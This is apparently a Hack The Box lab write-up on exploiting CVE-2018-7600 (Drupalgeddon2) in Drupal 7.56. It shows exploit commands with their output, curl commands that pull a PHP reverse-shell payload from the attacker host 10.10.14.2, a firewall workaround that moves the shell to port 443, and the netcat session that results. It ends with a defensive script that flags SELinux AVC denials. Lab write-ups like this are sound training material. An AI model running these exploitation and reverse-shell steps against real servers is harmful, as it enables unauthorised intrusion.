Drupalgeddon


The target Drupal instance is running version 7.56, which is obsolete and vulnerable to [[armageddon_cve-2018-7600#cve-2018-7600|CVE-2018-7600]], a.k.a. [[Armageddon_CVE-2018-7600#Exploit (Drupalgeddon)|Drupalgeddon2]].

┌──(kali㉿kali)-[~/…/htb/labs/armageddon/CVE-2018-7600]
└─$ python3 drupa7-cve-2018-7600.py http://$IP/ -c "id"                                             
 
=============================================================================
|          DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600)           |
|                              by pimps                                     |
=============================================================================
 
[*] Poisoning a form and including it in cache.
[*] poisoned form id: form-j985sLiKDI_AyUMBm2mJagMHNqPKfeYYYQXz5oxaqNM
[*] triggering exploit to execute: id
uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0

I can confirm RCE

Fail (Possible Firewall?)


┌──(kali㉿kali)-[~/…/htb/labs/armageddon/CVE-2018-7600]
└─$ python3 drupa7-CVE-2018-7600.py http://$IP/ -c "curl http://10.10.14.2/shell.php -o ./shell.php"
 
=============================================================================
|          DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600)           |
|                              by pimps                                     |
=============================================================================
 
[*] Poisoning a form and including it in cache.
[*] Poisoned form ID: form-XCpKapWB20OUShdDvdAnIZ_nctSS0g3ZqwQPiWRSN5M
[*] Triggering exploit to execute: curl http://10.10.14.2/shell.php -o ./shell.php

Uploading the PHP payload via the [[Armageddon_CVE-2018-7600#Exploit (Drupalgeddon)|Drupalgeddon2]] exploit

I got a hit

┌──(kali㉿kali)-[~/archive/htb/labs/armageddon]
└─$ curl -s http://$IP/shell.php

Triggering the PHP payload

┌──(kali㉿kali)-[~/archive/htb/labs/armageddon]
└─$ curl -s http://$IP/shell.php
<pre>DAEMONIZE: pcntl_fork() does not exists, moving on...
SOC_ERROR: 13: Permission denied
</pre>

The initial execution of the PHP payload fails with the error message SOC_ERROR: 13: Permission denied. The target system is running CentOS, which usually comes with a firewall configured. That may be the reason why I am unable to open port 9999 to spawn a shell session, as it is an unusual port that the system does not permit.

Re-attempt (Success)


I have changed the line above to set the port to 443 for the re-attempt.

┌──(kali㉿kali)-[~/…/htb/labs/armageddon/CVE-2018-7600]
└─$ python3 drupa7-cve-2018-7600.py http://$IP/ -c "rm ./shell.php ; curl http://10.10.14.2/shell.php -o ./shell.php"
 
=============================================================================
|          DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600)           |
|                              by pimps                                     |
=============================================================================
 
[*] Poisoning a form and including it in cache.
[*] poisoned form id: form-H60ApInSqoPo5d37W75U_SVaD3b_LZKYLwqTZOkYet8
[*] triggering exploit to execute: rm ./shell.php ; curl http://10.10.14.2/shell.php -o ./shell.php

I removed the previous payload and re-uploaded the PHP payload with the updated port.

┌──(kali㉿kali)-[~/archive/htb/labs/armageddon]
└─$ curl -s http://$IP/shell.php

Triggering it

┌──(kali㉿kali)-[~/archive/htb/labs/armageddon]
└─$ nnc 443 
listening on [any] 443 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.233] 35982
socket: Shell has connected! PID: 4159
whoami
apache
hostname
armageddon.htb
ifconfig
ens192: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.10.233  netmask 255.255.255.0  broadcast 10.10.10.255
        inet6 fe80::7648:5ea1:5371:b3b5  prefixlen 64  scopeid 0x20<link>
        inet6 dead:beef::69d1:bb00:780c:f997  prefixlen 64  scopeid 0x0<global>
        ether 00:50:56:b9:77:2d  txqueuelen 1000  (Ethernet)
        RX packets 821434  bytes 140243070 (133.7 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 816419  bytes 301827324 (287.8 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 1448  bytes 146156 (142.7 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 1448  bytes 146156 (142.7 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

It worked. I wasn't allowed to use port 9999 for the reverse shell, whereas port 443 was okay. Initial foothold established on the target system as the apache user by exploiting [[armageddon_cve-2018-7600#cve-2018-7600|CVE-2018-7600]] on the target Drupal instance.
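The id output earlier shows the web server running in the SELinux httpd_t domain, and when SELinux is what blocks an outbound socket from a web shell, the errno 13 (Permission denied) failure is recorded as an AVC denial in /var/log/audit/audit.log, which is where an administrator would look for the failed tcp/9999 callback seen above. As an added example (not code from the original writeup), this Python script parses constructed AVC records and flags denied outbound TCP connects from httpd_t to ports outside an assumed expected set; the sample records and the expected-port set are assumptions for the example.

```python
import re

# Field layout of a Linux audit AVC denial record (standard audit.log format).
AVC_RE = re.compile(
    r'type=AVC msg=audit\((?P<ts>[\d.]+):(?P<serial>\d+)\): avc:\s+denied\s+'
    r'\{ (?P<perm>[^}]+?) \} for\s+pid=(?P<pid>\d+) comm="(?P<comm>[^"]*)"'
    r'(?: dest=(?P<dest>\d+))?.*?scontext=(?P<scontext>\S+) tcontext=(?P<tcontext>\S+)'
    r' tclass=(?P<tclass>\S+)'
)

# Ports the web server domain is expected to reach out to (assumption for this example).
EXPECTED_OUTBOUND = {80, 443}

def parse_avc(line):
    """Return the AVC fields as a dict, or None if the line is not an AVC denial."""
    m = AVC_RE.search(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["domain"] = rec["scontext"].split(":")[2]   # user:role:type:level -> type
    rec["pid"] = int(rec["pid"])
    rec["dest"] = int(rec["dest"]) if rec["dest"] else None
    return rec

def suspicious_httpd_connects(lines):
    """Pick out denied outbound TCP connects from httpd_t to ports outside the expected set."""
    hits = []
    for line in lines:
        rec = parse_avc(line)
        if not rec:
            continue
        if (rec["domain"] == "httpd_t" and rec["tclass"] == "tcp_socket"
                and rec["perm"].strip() == "name_connect"
                and rec["dest"] not in EXPECTED_OUTBOUND):
            hits.append((rec["pid"], rec["comm"], rec["dest"], rec["tcontext"]))
    return hits

# Constructed sample audit records for this example (not captured from the target).
SAMPLE_AUDIT = """\
type=AVC msg=audit(1617182400.101:812): avc:  denied  { name_connect } for  pid=4159 comm="httpd" dest=9999 scontext=system_u:system_r:httpd_t:s0 tcontext=system_u:object_r:unreserved_port_t:s0 tclass=tcp_socket permissive=0
type=SYSCALL msg=audit(1617182400.101:812): arch=c000003e syscall=42 success=no exit=-13 a0=b a1=7ffd0 a2=10 a3=0 items=0 ppid=1234 pid=4159 comm="httpd" exe="/usr/sbin/httpd" subj=system_u:system_r:httpd_t:s0 key=(null)
type=AVC msg=audit(1617182500.222:813): avc:  denied  { write } for  pid=2201 comm="httpd" name="settings.php" dev="dm-0" ino=1337 scontext=system_u:system_r:httpd_t:s0 tcontext=system_u:object_r:httpd_sys_content_t:s0 tclass=file permissive=0
""".splitlines()

if __name__ == "__main__":
    for pid, comm, dest, tctx in suspicious_httpd_connects(SAMPLE_AUDIT):
        print(f"pid={pid} comm={comm} attempted outbound tcp/{dest} ({tctx})")
```

A connect that SELinux allows (such as the tcp/443 callback that succeeded above) leaves no AVC record, so this check only covers the blocked attempts and needs to be paired with egress logging on the firewall or proxy.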